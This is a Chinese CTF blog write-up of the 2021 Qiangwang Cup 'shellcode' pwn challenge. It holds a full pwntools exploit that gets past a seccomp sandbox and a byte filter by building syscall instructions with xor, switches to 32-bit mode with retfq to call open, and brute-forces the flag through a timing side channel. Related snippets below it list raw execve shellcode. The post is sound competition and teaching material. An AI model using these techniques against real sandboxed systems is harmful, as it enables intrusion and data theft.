2021 强网杯 [强网先锋] shellcode

最新推荐文章于 2021-11-29 17:21:37 发布
最新推荐文章于 2021-11-29 17:21:37 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/118067019
版权

在这里插入图片描述
在这里插入图片描述
就是写入shellcode跑就行。但是shellcode不能有小于’\x1f’,也不能有等于‘\x7f’。问题的关键在于开了沙箱。

在这里插入图片描述只能使用这些系统调用。
orw只有r,怎么处理。

首先看o,我们发现给了系统调用5,这个系统调用在64的时候是fstat,但是在32模式情况下就是open,所以我们首先考虑使用retfq汇编语句来让我们的整个模式跳到32位,在32位下去调用系统调用5就可以获得open。
retfq使用的时候要注意,cs寄存器中存储的一个数字,0x23表示32位,0x33表示64位。调用retfq之后esp是cs寄存器值,esp+8就是返回地址了。

但是我们发现,我们把32位shellcode读到栈上以后栈的整个环境是64的,就会产生矛盾,所以我们需要一块全新的地方来写入我们的32位shellcode。
我们看到了系统调用可以mmap,所以我们第一步就是mmap申请一块地方,然后read32位shellcode过去。这里说一嘴因为syscall的汇编代码被ban了,所以我们写汇编语句的时候要耍点小手段,通过xor来得到syscall。

此时我们要读入shellcode到mmap,这个时候对我们的字符不会有检查,就随便写了。我们首先open打开文件,然后跳回64位,把读flag读出来,然后呢,没有write。

所以我们参考了2021蓝帽杯的silent,我们爆破,将每个可见字符拿去跟我们的flag进行比较,假如命中,我们让它跳入loop循环,假如我们程序卡在那里,说明命中了,然后一个字符一个字符爆破,得到flag。

下面的flag我自己写的,爆破大概爆了十分钟吧。
在这里插入图片描述

exp

#coding:utf-8
from pwn import *
context.log_level = 'debug'

append_x86 = '''
push ebx
pop ebx
'''
shellcode_x86 = '''
/*fp = open("flag")*/
mov esp,0x40404140
push 0x67616c66
push esp
pop ebx
xor ecx,ecx
mov eax,5
int 0x80
mov ecx,eax
'''
shellcode_flag = '''
push 0x33
push 0x40404089
retfq
'''

shellcode_x86 = asm(shellcode_x86)
shellcode_flag = asm(shellcode_flag,arch = 'amd64',os = 'linux')
shellcode = ''
append = '''
push rdx
pop rdx
'''
# 0x40404040 为32位shellcode地址
shellcode_mmap = '''
/*mmap(0x40404040,0x7e,7,34,0,0)*/
push 0x40404040 /*set rdi*/
pop rdi

push 0x7e /*set rsi*/
pop rsi

push 0x40 /*set rdx*/
pop rax
xor al,0x47
push rax
pop rdx

push 0x40 /*set r8*/
pop rax
xor al,0x40
push rax
pop r8

push rax /*set r9*/
pop r9

/*syscall*/
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x31],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x32],cl

push 0x22 /*set rcx*/
pop rcx

push 0x40/*set rax*/
pop rax
xor al,0x49

'''
shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70

'''

shellcode_retfq = '''
push rbx
pop rax

xor al,0x40

push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''

shellcode += shellcode_mmap
shellcode += append
shellcode += shellcode_read
shellcode += append

shellcode += shellcode_retfq
shellcode += append
shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
print hex(len(shellcode))



def exp(dis,char):
    #gdb.attach(p, "b *0x40026d\nc")
    #input()
    p.sendline(shellcode)
    sc = asm('''
            mov rdi,rcx
            mov rsi,0x40404200
            mov dl,0x40
            xor rax,rax
            syscall
            mov dl, byte ptr [rsi+{}]
            mov cl, {}
            cmp cl,dl
            jz loop
            mov al,231
            syscall
            loop:
            jmp loop
            '''.format(dis,char),arch = 'amd64',os = 'linux')

    p.sendline(shellcode_x86 + 0x29*'\x90' + shellcode_flag + sc)
    #input()
    
flag = ""
for i in range(len(flag),50):
    sleep(1)
    log.success("flag : {}".format(flag))
    for j in range(0x100):
        p = process('./shellcode')
        try:
            exp(i,j)
            p.recvline(timeout=1)
            flag += chr(j)
            p.send('\n')
            log.success("{} pos : {} success".format(i,chr(j)))
            log.success(flag)
            p.close()
            break
        except:
            p.close()
yongbaoii
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn题shellcode收集
lifanxin的博客
02-25 4745
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
强网杯2021 [强网先锋]赌徒
weixin_45805993的博客
09-14 432
0x00 前言 当时打比赛的时候因为队里的web师傅tql(r2 yyds),就一直在做misc,web就做了一道强网先锋,现在回来复现一下,不过buu的上的题不全,也没得办法 0x01 [强网先锋]赌徒 正好还留着有源码,先贴一波 <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sy
强网杯2021 pop-master
azraelxuemo的博客
08-12 377
这个题目比较好的思路是写静态分析利用代码 当然这个题目可能混淆不是很多,所以利用起来稍微方便一点,可以参考如下代码 首先下载pop代码保存为class.php 保存下面php静态分析代码为filter.php.需要修改你本地的autoload.php位置和entryFunc的内容 <?php ini_set('max_execution_time', '300'); require 'D:\phpstudy_pro\Extensions\php\php8.0.2nts\ext\vendor\autol
2021 强网杯 [强网先锋]orw
yongbaoii的博客
06-23 599
RELRO没都开,能劫持got,NX也没开,总得写点shellcode。 是个堆。 只能申请两个chunk,但是好像有个序号可以越界。
强网杯2021 [强网先锋]orw
半岛铁盒的博客
06-29 811
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 948
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
2021强网杯赛题.zip
12-17
强网杯
2021 天翼杯 pwn ezshell
yongbaoii的博客
09-24 1042
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
SCU新生赛2021 pwn wp
N1rvana的博客
11-29 4294
前段时间的极客大挑战20212021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。 ret2text 简单的栈溢出,pwn里的hello world。 from pwn import * r = process("/mnt/hgfs/ubuntu/stackoverflow") elf = ELF("/mnt/hgfs/ubuntu/stackoverflow") payload = b'a'*0x3
强网杯2021线上赛习得
Wawyw's Blog
06-18 686
0x00 前言 强网杯的题目质量就是高,奈何没几个我会做的????(还是太菜) 以下对从这次比赛所学习到的干货(主要是web方面)进行记录。 0x01 pop_master index.php 代码 <?php include "class.php"; //class.php.txt highlight_file(__FILE__); $a = $_GET['pop']; $b = $_GET['argv']; $class = unserialize($a); $class->NGPaqV($
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1170
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn
yongbaoii的博客
09-27 411
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
【pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 4788
【pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击 简
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
解析两道pwn题shellcode利用
weixin_44113469的博客
03-12 2037
两道题都是shellcode直接利用,简单记录解题的过程。 runit 逻辑不难,使用mmap()分配一块内存,然后通过read函数写入数据到这个内存块,接下来就直接执行我们输入的数据,所以可以直接构造shellcode注入到该内存块,完事。 exp ...
一步一步学ROP之gadgets和2free篇
omnispace的博客
03-06 2462
原文: http://drops.wooyun.org/binary/10638 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x64的ROP攻击。 一步一步学ROP之linux_x86篇http://d
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值